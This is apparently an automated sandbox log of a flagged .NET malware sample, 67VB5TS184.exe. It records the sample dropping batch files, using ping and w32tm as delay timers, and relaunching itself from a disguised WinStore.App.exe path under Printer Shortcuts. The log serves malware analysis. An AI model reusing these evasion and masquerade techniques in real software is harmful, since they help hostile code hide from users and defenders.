Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03

Source: C:\Users\user\Desktop\67VB5TS184.exe

File created: C:\Users\user\AppData\Local\Temp\eNWsovLG80

Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat"

Source: 67VB5TS184.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 67VB5TS184.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\67VB5TS184.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\67VB5TS184.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 67VB5TS184.exe	ReversingLabs: Detection: 71%
Source: 67VB5TS184.exe	Virustotal: Detection: 55%

Source: C:\Users\user\Desktop\67VB5TS184.exe

File read: C:\Users\user\Desktop\67VB5TS184.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\67VB5TS184.exe "C:\Users\user\Desktop\67VB5TS184.exe"
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\Desktop\67VB5TS184.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\EtVpSBU0kW.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rfQPUbaSjc.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lRXC83nrKa.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wtO4vJVMF8.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zd3m5m79sA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HY3kVmQ00V.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2ucUGghGnf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Q8sISb3ARb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\0T9X0LKmT6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ge8uHQboyx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OTvWQnNRQU.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe "C:\Users\user\PrintHood\WinStore.App.exe"

Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\67VB5TS184.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe	Section loaded: mscoree.dll	Jump to behavior
